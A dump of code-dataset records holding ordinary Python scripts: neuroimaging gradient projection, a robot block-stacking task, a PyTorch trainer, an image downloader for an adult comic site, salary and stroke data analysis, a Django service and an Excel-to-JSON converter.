make_out_dir(out_path):\n \n #Make subdirectories to save files\n filename = out_path\n if not os.path.exists(os.path.dirname(filename)):\n try:\n os.makedirs(os.path.dirname(filename))\n except OSError as exc: # Guard against race condition\n if exc.errno != errno.EEXIST:\n raise\n\n#projecting to cortex. Left and Right seperately \n\ndef fill_array(mask_data,grad_array,low,up,roi):\n\n sliced_array = grad_array[low:up]\n mask_shape=np.shape(mask_data)\n #print(np.shape(sliced_array))\n q=0\n for i in range(0,mask_shape[0]):\n for j in range(0,mask_shape[1]):\n for k in range(0,mask_shape[2]):\n if mask_data[i,j,k] == roi:\n mask_data[i,j,k]= sliced_array[q]\n q=q+1 \n\n return mask_data\n\n\n\n\ndef get_sbctx_projections(grad_array,side,output_file):\n \n \n if side =='R':\n mask_data = nib.load(snakemake.params.str_rh).get_fdata()\n img = nib.load(snakemake.params.str_rh)\n mask_data = fill_array(mask_data,grad_array,0,1010,51)\n mask_data = fill_array(mask_data,grad_array,1010,1765,50)\n mask_data = fill_array(mask_data,grad_array,1765,1905,58)\n final_img = nib.Nifti1Image(mask_data, img.affine, img.header)\n nib.save(final_img,output_file)\n\n if side =='L':\n mask_data = nib.load(snakemake.params.str_lh).get_fdata()\n img = nib.load(snakemake.params.str_lh)\n mask_data = fill_array(mask_data,grad_array,0,1060,12)\n mask_data = fill_array(mask_data,grad_array,1060,1788,11)\n mask_data = fill_array(mask_data,grad_array,1788,1923,26)\n final_img = nib.Nifti1Image(mask_data, img.affine, img.header)\n nib.save(final_img,output_file)\n\n\n\n\n\n#emb_dir ='/home/dimuthu1/scratch/PPMI_project2/derivatives/analysis/smoothed/gradients/bs_emb'\n\n\n\ndef get_sbctx(sbctx_L,sbctx_R,sbctx_mean_L,sbctx_mean_R,grad):\n\n aligned_emb_sbctx_R = dill.load(open(snakemake.input.aligned_grad_sbctx_R, \"rb\"))\n aligned_emb_sbctx_L = dill.load(open(snakemake.input.aligned_grad_sbctx_L, \"rb\"))\n mean_emb_sbctx_L= dill.load(open(snakemake.input.mean_grad_sbctx_L, \"rb\"))\n mean_emb_sbctx_R= dill.load(open(snakemake.input.mean_grad_sbctx_R, \"rb\"))\n\n\n for i, s in enumerate(subj):\n emb_sbctx_L = aligned_emb_sbctx_L[:,grad,i] #projecting gradient 3\n emb_sbctx_R = aligned_emb_sbctx_R[:,grad,i] #projecting gradient 3\n \n get_sbctx_projections(emb_sbctx_L,'L',sbctx_L[i])\n get_sbctx_projections(emb_sbctx_R,'R',sbctx_R[i])\n\n\n\n emb_sbctx_L_mean = mean_emb_sbctx_L.gradients_[:,grad] #Mean gradient is passed as an object\n emb_sbctx_R_mean = mean_emb_sbctx_R.gradients_[:,grad] #Mean gradient is passed as an object\n #print(np.shape(emb_sbctx_R_12.gradients_))\n get_sbctx_projections(emb_sbctx_L_mean,'L',sbctx_mean_L)\n get_sbctx_projections(emb_sbctx_R_mean,'R',sbctx_mean_R)\n\n\n\nmake_out_dir(snakemake.params.out_path+'/sbctx/')\n#get_sbctx()\n\n\n\n#sorting file names for aligned gradients according to gradient number\ngrad1_L_list= [x for x in snakemake.output.sbctx_L if 'grad1' in x ]\ngrad2_L_list= [x for x in snakemake.output.sbctx_L if 'grad2' in x ]\ngrad3_L_list= [x for x in snakemake.output.sbctx_L if 'grad3' in x ]\n\ngrad1_R_list= [x for x in snakemake.output.sbctx_R if 'grad1' in x ]\ngrad2_R_list= [x for x in snakemake.output.sbctx_R if 'grad2' in x ]\ngrad3_R_list= [x for x in snakemake.output.sbctx_R if 'grad3' in x ]\n\n#sorting file names for mean gradients according to gradient number\nmean_grad1_L_list= [x for x in snakemake.output.sbctx_mean_L if 'grad1' in x ]\nmean_grad2_L_list= [x for x in snakemake.output.sbctx_mean_L if 'grad2' in x ]\nmean_grad3_L_list= [x for x in snakemake.output.sbctx_mean_L if 'grad3' in x ]\n\nmean_grad1_R_list= [x for x in snakemake.output.sbctx_mean_R if 'grad1' in x ]\nmean_grad2_R_list= [x for x in snakemake.output.sbctx_mean_R if 'grad2' in x ]\nmean_grad3_R_list= [x for x in snakemake.output.sbctx_mean_R if 'grad3' in x ]\n\nget_sbctx(grad1_L_list, grad1_R_list, mean_grad1_L_list[0], mean_grad1_R_list[0],0)\nget_sbctx(grad2_L_list, grad2_R_list, mean_grad2_L_list[0], mean_grad2_R_list[0],1)\nget_sbctx(grad3_L_list, grad3_R_list, mean_grad3_L_list[0], mean_grad3_R_list[0],2)\n\n\n","repo_name":"DimuthuHemachandra/functional_gradients","sub_path":"scripts/projection_sbctx.py","file_name":"projection_sbctx.py","file_ext":"py","file_size_in_byte":5597,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"63"} +{"seq_id":"28981203463","text":"import numpy as np\nimport os\nimport pybullet as p\nimport random\nfrom cliport.tasks import primitives\nfrom cliport.tasks.grippers import Spatula\nfrom cliport.tasks.task import Task\nfrom cliport.utils import utils\nimport numpy as np\nfrom cliport.tasks.task import Task\nfrom cliport.utils import utils\n\nclass ColorCoordinatedBlockTower(Task):\n \"\"\"Stack four blocks on a pallet in the following order from bottom to top: \n two blue blocks side by side, one red block centered on the blue blocks, \n and one green block on top of the red block.\"\"\"\n\n def __init__(self):\n super().__init__()\n self.max_steps = 10\n self.lang_template = \"stack four blocks on a pallet in the following order from bottom to top: two blue blocks side by side, one red block centered on the blue blocks, and one green block on top of the red block.\"\n self.task_completed_desc = \"done stacking blocks.\"\n self.additional_reset()\n\n def reset(self, env):\n super().reset(env)\n\n # Add pallet.\n # x, y, z dimensions for the asset size\n pallet_size = (0.15, 0.15, 0.015)\n pallet_urdf = 'pallet/pallet.urdf'\n pallet_pose = self.get_random_pose(env, pallet_size)\n env.add_object(pallet_urdf, pallet_pose, 'fixed')\n\n # Add blocks.\n # x, y, z dimensions for the asset size\n block_size = (0.04, 0.04, 0.04)\n block_urdf = 'block/block.urdf'\n block_colors = [utils.COLORS['blue'], utils.COLORS['blue'], utils.COLORS['red'], utils.COLORS['green']]\n blocks = []\n for i in range(4):\n block_pose = self.get_random_pose(env, block_size)\n block_id = env.add_object(block_urdf, block_pose, color=block_colors[i])\n blocks.append(block_id)\n\n # Associate placement locations for goals.\n place_pos = [(0, -0.02, 0.02), (0, 0.02, 0.02), (0, 0, 0.06), (0, 0, 0.10)]\n targs = [(utils.apply(pallet_pose, i), pallet_pose[1]) for i in place_pos]\n\n # Goal: two blue blocks are placed side by side on the pallet.\n # Break the language prompt step-by-step\n self.add_goal(objs=blocks[:2], matches=np.ones((2, 2)), targ_poses=targs[:2], replace=False,\n rotations=True, metric='pose', params=None, step_max_reward=1 / 3, symmetries=[np.pi/2]*2,\n language_goal=\"place two blue blocks side by side on the pallet\")\n\n # Goal: one red block is placed centered on the blue blocks.\n self.add_goal(objs=blocks[2:3], matches=np.ones((1, 1)), targ_poses=targs[2:3], replace=False,\n rotations=True, metric='pose', params=None, step_max_reward=1 / 3, symmetries=[np.pi/2],\n language_goal=\"place one red block centered on the blue blocks\")\n\n # Goal: one green block is placed on top of the red block.\n self.add_goal(objs=blocks[3:], matches=np.ones((1, 1)), targ_poses=targs[3:], replace=False,\n rotations=True, metric='pose', params=None, step_max_reward=1 / 3, symmetries=[np.pi/2],\n language_goal=\"place one green block on top of the red block\")","repo_name":"liruiw/GenSim","sub_path":"cliport/generated_tasks/color_coordinated_block_tower.py","file_name":"color_coordinated_block_tower.py","file_ext":"py","file_size_in_byte":3108,"program_lang":"python","lang":"en","doc_type":"code","stars":154,"dataset":"github-code","pt":"63"} +{"seq_id":"3280190261","text":"from tqdm import tqdm \nfrom utils import get_device\n\ndevice = get_device()\n\nclass Trainer:\n def __init__(self,model,train_loader,optimizer,criterion,device) -> None:\n self.train_losses = []\n self.train_accuracies=[]\n self.epoch_train_accuracies=[]\n if device=='cuda':\n self.model = model.cuda()\n else:\n self.model = model\n self.train_loader= train_loader\n self.optimizer = optimizer\n self.criterion =criterion\n self.device = device\n self.lr_history =[]\n\n def train(self,epoch,use_l1,lambda_l1=0.01):\n\n self.model.train()\n\n lr_trend =[]\n correct = 0\n processed=0\n train_loss=0\n\n # output looks nicer\n pbar = tqdm(self.train_loader)\n\n for batch_id,(inputs,targets) in enumerate(pbar):\n #transfer to device\n inputs = inputs.to(self.device)\n targets= targets.to(self.device)\n\n # set grad=0\n self.optimizer.zero_grad()\n\n # prediction\n outputs = self.model(inputs)\n\n # calculate loss\n loss = self.criterion(outputs,targets)\n\n # use L1 loss = Actual loss + Parameters Count\n l1=0\n if use_l1:\n for p in self.model.parameters():\n l1+=p.abs().sum()\n loss = loss+lambda_l1*l1\n\n # Plotting train_loss\n self.train_losses.append(loss.item())\n\n # backpropagation\n loss.backward()\n self.optimizer.step()\n\n # get the index of the max log-probability\n pred = outputs.argmax(dim=1,keepdim=True)\n correct += pred.eq(targets.view_as(pred)).sum().item()\n processed+=len(inputs)\n\n\n # Description\n pbar.set_description(\n desc= f\"Batch={batch_id} | Epoch={epoch} | LR={self.optimizer.param_groups[0]['lr']} | Loss={loss.item():3.4f} | Accuracy={100*correct/processed:0.4f}\"\n )\n self.train_accuracies.append(100*correct/processed)\n\n # After all the batches are done append accuracy for epoch\n self.epoch_train_accuracies.append(100*correct/processed)\n\n self.lr_history.extend(lr_trend)\n return (\n 100 * correct/processed , \n train_loss/len(self.train_loader), \n lr_trend\n )\n","repo_name":"Muthukamalan/100-days-of-coding","sub_path":"session 8/failed_archieve/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":2437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"14416109693","text":"import concurrent.futures\nimport logging\nimport os\nimport re\nimport urllib.request\nimport browser_cookie3\n\nfrom bs4 import BeautifulSoup\nfrom Downloader import Downloader, Parser, STATUS_DOWNLOADING, STATUS_DOWNLOADED, STATUS_FAIL\n\n\nclass ImHentaiParser(Parser):\n\n def __init__(self, url, path, pool):\n super(ImHentaiParser, self).__init__(url, path, pool)\n\n def check(self):\n match = re.match('^https://imhentai.xxx/', self.url)\n if match is not None:\n logging.info(f'parse_imhentai.xxx')\n return True\n return False\n\n def run(self):\n try:\n #cj = browser_cookie3.chrome(domain_name='parse_imhentai.xxx')\n #logging.debug(cj)\n opener = urllib.request.build_opener()\n opener.addheaders = [('User-Agent', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36')]\n urllib.request.install_opener(opener)\n req = urllib.request.Request(self.url)\n result = urllib.request.urlopen(req, timeout=5).read()\n soup = BeautifulSoup(result, 'html.parser')\n comic_name = soup.find('p', class_='subtitle').text\n if comic_name is None or len(comic_name) == 0:\n raise Exception(\"Can't parse comic_name!\")\n # 剔除windows不合法路徑字元\n comic_name = re.sub('[\\\\\\\\<>:\"?*/\\t]', '', comic_name)\n comic_name = comic_name.strip()\n logging.debug(f'comic name = \\\"{comic_name}\\\"')\n\n match = re.match('.*/gallery/(\\\\d+)/.*', self.url)\n if match is None or match.group(1) is None:\n raise Exception(\"Can't parse media_id!\")\n\n view_id = match.group(1)\n logging.debug(f'view_id = {view_id}')\n\n li_text = soup.find('li', class_='pages').text\n if li_text is None:\n raise Exception(\"Can't parse pages!\")\n match = re.match('Pages: (\\\\d+)', li_text)\n if match is None or match.group(1) is None:\n raise Exception(\"Can't parse media_id!\")\n\n pages = match.group(1)\n logging.debug(f'pages = {pages}')\n\n req = urllib.request.Request(f'https://imhentai.xxx/view/{view_id}/1/')\n result = urllib.request.urlopen(req, timeout=5).read()\n logging.debug(result)\n soup = BeautifulSoup(result, 'html.parser')\n\n img = soup.find('img', id='gimg')\n logging.debug(f'img = {img[\"data-src\"]}')\n match = re.match('https://m7.imhentai.xxx/\\\\d+/(.+)/\\\\d+.(.+)', img['data-src'])\n if match is None or match.group(1) is None or match.group(2) is None:\n raise Exception(\"Can't parse ext!\")\n media_id = match.group(1)\n logging.debug(f'media_id = {media_id}')\n ext = match.group(2)\n logging.debug(f'ext = {ext}')\n\n self.signal.parsed.emit(ImHentaiDownloader(self.path, comic_name, self.pool, media_id, pages, ext))\n except Exception as e:\n logging.error(e)\n\n\nclass ImHentaiDownloader(Downloader):\n\n def __init__(self, path, name, pool, id, pages, ext):\n super(ImHentaiDownloader, self).__init__(f'{path}{name}', name, pool)\n self.id = id\n self.pages = int(pages)\n self.ext = ext\n self.downloaded = 0\n\n def download_url(self, url, path):\n urllib.request.urlretrieve(url, path)\n\n return self.download_url(url, path) if os.path.getsize(path) < 1 else True\n\n def run(self):\n logging.info(f'Downloading : \\\"{self.path}\\\"')\n\n try:\n if not os.path.exists(self.path):\n os.makedirs(self.path)\n\n self.signal.status.emit(STATUS_DOWNLOADING)\n\n with concurrent.futures.ThreadPoolExecutor(max_workers=32) as executor:\n future_to_url = {\n executor.submit(self.download_url, f'https://m7.imhentai.xxx/022/{self.id}/{page}.{self.ext}',\n f'{self.path}\\{page}.{self.ext}'): page for page in range(1, self.pages + 1)}\n for future in concurrent.futures.as_completed(future_to_url):\n page = future_to_url[future]\n\n try:\n if future.result():\n self.downloaded += 1\n self.signal.progress.emit(int(self.downloaded / self.pages * 100))\n # logging.info(f'Finished {self.downloaded}/{self.pages} : {progress}%')\n\n except Exception as e:\n logging.warning(f\"{e} : https://m7.imhentai.xxx/022/{self.id}/{page}.{self.ext}\")\n another_ext = 'png' if self.ext == 'jpg' else 'jpg'\n try:\n another_future = executor.submit(self.download_url,\n f'https://m7.imhentai.xxx/022/{self.id}/{page}.{another_ext}',\n f'{self.path}\\{page}.{another_ext}')\n if another_future.result():\n self.downloaded += 1\n self.signal.progress.emit(int(self.downloaded / self.pages * 100))\n except Exception as e:\n logging.error(e)\n logging.error(\n f\"fail download https://m7.imhentai.xxx/022/{self.id}/{page}.{another_ext}\")\n pass\n\n except Exception as e:\n raise e\n finally:\n self.signal.status.emit(STATUS_DOWNLOADED if self.downloaded == self.pages else STATUS_FAIL)\n self.signal.finished.emit()\n","repo_name":"eytu0233/HentaiDownloader","sub_path":"ImHentaiDownloader.py","file_name":"ImHentaiDownloader.py","file_ext":"py","file_size_in_byte":5850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"33964468890","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Oct 16 14:04:03 2021\n\n@author: poorv\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\n\ndf = pd.read_csv('glassdoor_jobs.csv')\n\n\n\n'''\nRemove the observations where the salary data is missing\n'''\ndf=df[df['Salary Estimate']!='-1']\n\n\n'''\nRemove irrelevant Job Titles \n'''\nrelevant= ['scientist', 'data', 'analyst', 'science', 'analysis', 'insight', 'machine learning']\n\nrelevance_bool = df['Job Title'].apply(lambda title: True if any([x for x in relevant if x in title.lower()]) else False)\ndf = df[relevance_bool]\n\ndel relevance_bool, relevant\n\n\n'''\nCreate new column Salary Source by extracting information from Salary field\n'''\n\ndf['Salary Source']=df['Salary Estimate'].apply(lambda sal: sal.split('(')[1][0:-2] if 'Glassdoor' in sal else sal.split(':')[0])\ndf['Salary Estimate']=df['Salary Estimate'].apply(lambda sal: sal.split('(')[0] if 'Glassdoor' in sal else sal.split(':')[1])\n\n\n\n'''\nHandle Hourly Salaries\n'''\n#create new feature to indicate hourly\ndf['Hourly'] = df['Salary Estimate'].apply(lambda sal: 1 if 'per hour' in sal.lower() else 0)\n\n#Remove Per Hour from Salary Estimate\ndf['Salary Estimate']=df['Salary Estimate'].apply(lambda sal: sal.split('Per')[0].strip() if 'Per Hour' in sal else sal)\n\n#Remove 'K's and '$'s and convert to integers\ndf['Salary Estimate'] = df['Salary Estimate'].apply(lambda sal: sal.replace('K','',3).replace('$','',3))\n\n\n#Split to get min and max salaries as Integers\ndf['Min Salary'] = df['Salary Estimate'].apply(lambda sal: sal.split(' - ')[0] if '-' in sal else sal).astype('int32')\ndf['Max Salary'] = df['Salary Estimate'].apply(lambda sal: sal.split(' - ')[1] if '-' in sal else sal).astype('int32')\n\n\n#Multiply Hourly Salaries to get Annual Salary\n#Note that here we are using apply on a dataframe instead of a series, so the lambda will work on each row (since axis=1) instead of each cell\ndf['Min Salary'] = df.apply(lambda row: row['Min Salary']*1.72 if row['Hourly']==1 else row['Min Salary'], axis=1)\ndf['Max Salary'] = df.apply(lambda row: row['Max Salary']*1.72 if row['Hourly']==1 else row['Max Salary'], axis=1)\n\n#Get Average Salary column and drop the Salary Estimate column\ndf['Average Salary'] = (df['Min Salary']+df['Max Salary'])*0.5\n\ndf=df.drop(columns='Salary Estimate')\n\n\n'''\nCheck for Missing Values\n'''\n#df.isnull().sum()\n\n\n'''\nCheck for dupliated rows\n'''\n\n#df.duplicated().value_counts()\n\n#NOTE: 353 Rows are duplicates. Not an ideal dataset for Data Science but we will use for this project.\n\n\n'''\nGroup Locations\n'''\n#df['Location'].value_counts()\n\n#define tuples (since you cannot use a list as a key in dictionaries) to group together related suburbs \nsyd_sub = tuple(['sydney', 'bella vista', 'parramatta', 'liverpool', 'alexandria', 'mascot', 'auburn'])\nmel_sub = tuple(['melbourne', 'frankston','docklands', 'melton'])\nother = tuple(['bunbury', 'darwin', 'bathurst', 'wollongong', 'gold coast'])\n\n#Define dictionary\ngroup_locations = {syd_sub:'Sydney',mel_sub:'Melbourne', other:'Other'}\n\n#Define a function to check dictionary and assign value\n#Note: we unpack the dictionary using .items() if we want to acces both key and val. otherwise a for loop will iterate over the keys by default\ndef loc_simplify(location):\n for key,val in group_locations.items():\n if location.lower().strip() in key:\n location = val \n return location\n\n#Map the fucntion over every value in the series using the apply method\ndf['Location'] = df['Location'].apply(loc_simplify)\n\n#delete instrumental objects\ndel group_locations, mel_sub, other, syd_sub\n\n\n\n'''\nNew feature: Seniority\n'''\n\nsenior = ['senior', 'lead', 'principal', 'head']\njunior = ['junior', 'entry level', 'graduate']\n\ndf['Seniority']=df['Job Title'].apply(lambda title: 'Senior' if any([x for x in senior if x in title.lower()]) else ('Junior' if any([x for x in junior if x in title.lower()]) else 'Mid'))\n\n\ndel senior, junior\n\n#df['Seniority'].value_counts()\n\n\n\n'''\nNew Feature: Job Function - Analyst vs Scientist\n'''\n#df['Job Title'].value_counts()\n\n#New Feature: Job Function - Analyst vs Scientist\nscientist = ['scientist', 'science', 'machine learning']\n\ndf['Job Function'] = df['Job Title'].apply(lambda title: 'Scientist' if any([x for x in scientist if x in title.lower()]) else 'Analyst')\n\ndel scientist\n\n\n\n'''\nGroup Company Names\n'''\n#Group the company names that occur less than four times into Other group\nval_counts=df['Company Name'].value_counts()\n\n#creating a list of companies where count<4\nother=list(val_counts.apply(lambda count: count if count<4 else None).dropna().index)\n\n#Grouping companies in the other list into a category\ndf['Company Name']=df['Company Name'].apply(lambda name: 'Other' if name in other else name) \n\n#deleting instrumental columns\ndel other, val_counts\n\n\n'''\nCombine -1 and Unknown in Size\n'''\n#df['Size'].value_counts()\n\ndf['Size'].replace('-1','Unknown', inplace=True) \n#Using Pandas replace since replacing the whole value of the cell. If want to replace only part of it, need to use the standard library replace with a lambda fucntion (as we did to remove 'K' and '$')\n\n'''\nClean up the mismatched data between Founded, Ownership, Industry, Sector, Revenue\n'''\n#Moving from Sector to Revenue\n#df['Sector'].value_counts()\n\n#defining a list of values to be moved from sector to revenue\nsec_to_rev = ['$1 to $2 billion (USD)', '$500 million to $1 billion (USD)','$2 to $5 billion (USD)', '$5 to $10 million (USD)', '$10+ billion (USD)']\n\n#creating a dataframe to check if the wrong values are just stray or are to be transferred to revenue column\nwrong_sector=df[df['Sector'].isin(sec_to_rev)]\n\n#Updating Revenue and deleting from Sector\ndf['Revenue'] = df.apply(lambda row: row['Sector'] if row['Sector'] in sec_to_rev else row['Revenue'], axis=1)\ndf['Sector'].replace(sec_to_rev, 'Unknown', inplace = True)\n\ndel wrong_sector, sec_to_rev\n\n\n#Moving from Ownership to Revenue\n#df['Type of ownership'].value_counts()\n\ndf['Revenue'] = df.apply(lambda row: row['Type of ownership'] if row['Type of ownership'] =='$50 to $100 million (USD)' else row['Revenue'], axis=1)\ndf['Type of ownership'].replace('$50 to $100 million (USD)', 'Unknown', inplace = True)\n\n\n#Moving from Ownership to Industry\n#df['Type of ownership'].value_counts()\n\nown_to_ind = ['Government', 'College / University', 'Express Delivery Service', 'Hospital', 'Food & Drink Manufacturing', 'Consulting', 'Regional Agencies', 'Utilities', 'Telecommunications Service']\n\ndf['Industry'] = df.apply(lambda row: row['Type of ownership'] if row['Type of ownership'] in own_to_ind else row['Industry'], axis=1)\ndf['Type of ownership'].replace(own_to_ind, 'Unknown', inplace = True)\n\ndel own_to_ind\n\n\n#Moving from Founded to 'Type of ownership'\n#df['Founded'].value_counts()\n\nfound_to_own = ['College / University', 'Company - Private', 'Non-profit Organisation', 'Company - Public']\n\nwrong_found=df[df['Founded'].isin(found_to_own)]\n\ndf['Type of ownership'] = df.apply(lambda row: row['Founded'] if row['Founded'] in found_to_own else row['Type of ownership'], axis=1)\ndf['Founded'].replace(found_to_own, 'Unknown', inplace = True)\n\ndel found_to_own,wrong_found\n\n\n#Moving from Founded to Industry and Sector\n\ndf['Sector'] = df.apply(lambda row: row['Founded'] if row['Founded'] == 'Government' else row['Sector'], axis=1)\ndf['Industry'] = df.apply(lambda row: row['Founded'] if row['Founded'] == 'Government' else row['Industry'], axis=1)\ndf['Founded'].replace('Government', 'Unknown', inplace = True)\n\n\n\n'''\nGrouping together categories\n'''\n#Creating Others Category in Industry and Sector\n\n#Refer link below for the logic\n#https://stackoverflow.com/questions/35041628/conditionally-create-an-other-category-in-categorical-column\n\ndf['Industry'][df['Industry'].isin(df['Industry'].value_counts()[df['Industry'].value_counts()<10].index)] = 'Other'\ndf['Sector'][df['Sector'].isin(df['Sector'].value_counts()[df['Sector'].value_counts()<10].index)] = 'Other'\n \n\n#Combine -1 and Unknown in Type of Owndership, Revenue, Industry, Sector\n\ndf['Type of ownership'] = df['Type of ownership'].replace(['-1', 'Unknown / Non-Applicable'], 'Unknown')\ndf['Revenue'] = df['Revenue'].replace(['-1', 'Unknown / Non-Applicable'], 'Unknown')\ndf['Industry'] = df['Industry'].replace('-1', 'Unknown')\ndf['Sector'] = df['Sector'].replace('-1', 'Unknown')\n\n\n\n'''\nGet company age from Founded\n'''\n#df['Founded'].value_counts()\n\nfrom datetime import datetime\n\ndf['Founded'].replace('Unknown', '-1', inplace=True)\ndf['Company Age'] = datetime.now().year - df['Founded'].astype('int32')\n\n\n\n'''\nExtract information from Job Description\n\n'''\n\ndf['SQL'] = df['Job Description'].apply(lambda desc: 1 if 'sql' in desc.lower() else 0)\ndf.SQL.value_counts()\n\ndf['Tableau'] = df['Job Description'].apply(lambda desc: 1 if 'tableau' in desc.lower() else 0)\ndf.Tableau.value_counts()\n\ndf['Excel'] = df['Job Description'].apply(lambda desc: 1 if 'excel' in desc.lower() else 0)\ndf['Excel'].value_counts()\n\n","repo_name":"PoorvalDhotre/salary_glassdoor_aus","sub_path":"data_cleaning.py","file_name":"data_cleaning.py","file_ext":"py","file_size_in_byte":8968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"14286658900","text":"# Visualize the categorical data and compute ratios\n# 22-06-2021\n# Jana Bersee, Koen Ceton, Jeroen Dijkmans, Dominique Weltevreden\n\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom data_processing import prepare_data\n\n# Load the data without one hot encoding\ndata_cat = prepare_data('healthcare-dataset-stroke-data.csv', one_hot = False,\n binary = False, normalize=False)\n\n# Make sure all values are strings, so plotting with histplot works\ndata_cat['hypertension'].replace(to_replace = (0, 1), value = ('no', 'yes'),\n inplace = True)\ndata_cat['heart_disease'].replace(to_replace = (0, 1), value = ('no', 'yes'),\n inplace = True)\n\n# For stroke a 1 means stroke and 0 means no stroke\ndata_cat['stroke'].replace(to_replace = (0, 1), value = ('no stroke', 'stroke'),\n inplace = True)\n\n# PLOTS\n\n# Create a figure to display multiple figures at once\nfig, axes = plt.subplots(4, 2, figsize=(20,10), sharey=True)\n\n# Adjust the settings of the subplot so titles are readable\nfig.subplots_adjust(left=None, bottom=None, right=None, top=0.95, wspace=None,\n hspace=0.25)\n\n# Add a title for the figures combined\nfig.suptitle('Figures to show categorical variables in dataset')\n\n# Pack parameters for each histplot:\nparameters = {\"data\": data_cat, \"hue\": \"stroke\", \"multiple\": \"stack\"}\n\n# Create histplots for all categorical data\nsns.histplot(ax=axes[0, 0], x = 'gender', **parameters)\nsns.histplot(ax=axes[0, 1], x = 'hypertension', **parameters)\nsns.histplot(ax=axes[1, 0], x = 'heart_disease', **parameters)\nsns.histplot(ax=axes[1, 1], x = 'ever_married', **parameters)\nsns.histplot(ax=axes[2, 0], x = 'work_type', **parameters)\nsns.histplot(ax=axes[2, 1], x = 'residence_type', **parameters)\nsns.histplot(ax=axes[3, 0], x = 'smoking_status', **parameters)\n\n# Turn off the bottom right axis as there is no plot there\naxes[3, 1].axis(\"off\")\n\n# Show the plot\nplt.show()\n\n# PROPORTIONS\n\ndef proportion(data, column_name):\n \"\"\"\n This function prints the ratios of stroke of every unique category in a\n feature (column_name)\n Ratio = samples in that category with stroke / total samples in category\n\n INPUT\n data : pandas dataframe\n column_name : str, column of which you want all the ratios per item\n\n OUTPUT\n Does not return anything, just prints the ratio per feature.\n \"\"\"\n\n # Find unique items\n uniques = data[column_name].unique()\n\n # Print instructions about the ratio\n print(f'\\nRatio = samples with stroke / total samples. \\n'\n f'Feature: {column_name}')\n\n # Loop over all the unique items\n for item in uniques:\n\n # Split data into different frames per unique item\n data_item = data[data[column_name] == item]\n\n # Total samples\n item_total = data_item.shape[0]\n\n # Retrive rows of specific frame with stroke\n data_item_stroke = data_item[data_item['stroke'] =='stroke']\n\n # Samples with stroke\n item_stroke = data_item_stroke.shape[0]\n\n # Calculate ratio\n ratio_item = item_stroke / item_total\n\n print(f'Ratio of subgroup {item}: {ratio_item:.5f}')\n\n# Run functions on every column of the categorical data\nproportion(data_cat, 'gender')\nproportion(data_cat, 'hypertension')\nproportion(data_cat, 'heart_disease')\nproportion(data_cat, 'ever_married')\nproportion(data_cat, 'work_type')\nproportion(data_cat, 'residence_type')\nproportion(data_cat, 'smoking_status')\n","repo_name":"koenc100/Project-AI-minor","sub_path":"code/data_visual_cat.py","file_name":"data_visual_cat.py","file_ext":"py","file_size_in_byte":3559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"27448363527","text":"# 仓库 service\nfrom knowledgePlatform.repository.models import RepositoryEntity\nimport datetime\n\n\n# 查询所有的仓库\ndef get_all_repository(repository_type_arg, repository_level):\n query_set_list = RepositoryEntity.objects.filter(repository_type=repository_type_arg, level=repository_level)\n l = []\n for item in query_set_list:\n d = dict()\n d[\"repository_name\"] = item.repository_name\n d[\"id\"] = item.id\n d[\"is_active\"] = \"生效\" if item.is_active == 1 else \"失效\"\n d[\"create_date\"] = item.create_date.strftime('%Y-%m-%d %H:%M:%S')\n d[\"update_date\"] = item.update_date.strftime('%Y-%m-%d %H:%M:%S')\n d[\"flag\"] = 1\n\n sub_l = []\n query_set_sub_list = RepositoryEntity.objects.filter(parent_id=item.id)\n for sub_item in query_set_sub_list:\n sub_d = dict()\n sub_d[\"repository_name\"] = sub_item.repository_name\n sub_d[\"id\"] = sub_item.id\n sub_d[\"is_active\"] = \"生效\" if sub_item.is_active == 1 else \"失效\"\n sub_d[\"create_date\"] = sub_item.create_date.strftime('%Y-%m-%d %H:%M:%S')\n sub_d[\"update_date\"] = sub_item.update_date.strftime('%Y-%m-%d %H:%M:%S')\n sub_l.append(sub_d)\n\n d['children'] = sub_l\n\n l.append(d)\n return l\n\n\ndef repository_create(repository_entity:RepositoryEntity):\n date = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n repository_entity.create_date = date\n repository_entity.update_date = date\n repository_entity.save()\n return \"ok\"\n","repo_name":"zhoajia/knowledgePlatform1","sub_path":"knowledgePlatform/repository/repository_service.py","file_name":"repository_service.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"30842906727","text":"# -*- coding: utf-8 -*-\n# 这段代码主要的功能是把excel表格转换成utf-8格式的json文件\nimport os\nimport sys\nimport codecs\nimport xlrd #http://pypi.python.org/pypi/xlrd\nimport json\nimport time\nimport ExcelInfo\nimport importlib\nimportlib.reload(sys)\n\n#获取相对路径下的所有文件名\ndef all_path(dirname):\n result = {}\n for maindir, subdir, file_name_list in os.walk(dirname):\n for filename in file_name_list:\n apath = os.path.join(maindir, filename)\n result[filename]=apath\n return result\n\nif __name__ == '__main__':\n config=json.load(open( 'Config.json','r'))\n paths=all_path(config[\"srcFolder\"])\n for key in paths:\n if key[0]=='~':#忽略打开的Excel文件产生的临时文件\n continue\n if key[0]=='!':#忽略!开头的文件\n continue\n pair=key.split('.')\n if len(pair)<=0:\n continue\n if pair[len(pair)-1]=='xlsx' or pair[len(pair)-1]=='xls':\n print('parsing excel:'+paths[key])\n finalJsons = ExcelInfo.ExcelInfo(paths[key],config[\"headRow\"],config[\"round\"],config[\"ignoreEmpty\"]).FinalTable()\n for key in finalJsons:\n outPath=config[\"destFolder\"]+'/'+ key+'.json'\n with open(outPath,'w',encoding='UTF-8') as fileobject:\n if config[\"format\"]==True:\n fileobject.write(json.dumps(finalJsons[key],indent=4,ensure_ascii=False))\n else:\n fileobject.write(json.dumps(finalJsons[key],ensure_ascii=False))\n print('exported json --> '+outPath)\n print()\n\n print(\"All OK\")\n 